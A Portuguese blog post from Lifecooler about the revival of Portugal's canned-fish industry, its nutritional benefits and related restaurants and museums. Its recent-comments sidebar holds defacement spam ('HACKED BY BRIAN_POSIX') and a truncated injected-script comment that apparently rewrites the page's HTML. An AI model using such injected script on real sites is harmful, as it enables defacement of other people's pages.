Lifecooler @ 18:03

Ter, 06/11/12

Portugal é um país atlântico com tradição secular nas conservas. O sector conserveiro foi um dos maiores exportadores do século passado. Eram centenas de fábricas, hoje são 20. Mas ao lado das ruínas ainda há resistentes. E Portugal parece despertar de novo para as conservas a ponto de alguns dos chefes mais badalados já as introduzirem em algumas das suas criações.

São várias as razões para este ressurgimento. Em primeiro lugar, as vantagens alimentares: Fonte natural de proteínas, vitaminas, minerais e ácidos gordos essenciais ao organismo, o peixe enlatado mantém o teor de proteína e apresenta quantidades superiores de cálcio – um benefício do processamento térmico ao amaciar as pequenas espinhas de forma a poderem ser digeridas. A sardinha em conserva, por exemplo, contém um teor de cálcio até 10 vezes superior ao produto fresco ou congelado.

Começam a surgir espaços que comercializam este tipo de produto para consumo no local e até livros de receitas criativas que utilizam as conservas como elemento principal.

Enguias, carapau, truta, ovas, berbigão, caramujos, lapas, lulas, mexilhão e polvo são exemplos de peixes e moluscos que se encontram em conserva.

Produto que se cruza com o gourmet e o design (ver por exemplo o peixe-espada preto de Sesimbra que se começou a comercializar em 2011), mantém o seu carácter popular mas com um toque refinado.

 

Vale a pena fazer um roteiro por restaurantes com o tema, casas de petiscos que editam livros de receitas, museus instalados em antigas fábricas de conservas e que ganham prémios europeus e muito mais.

 

Veja o vídeo aqui!


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO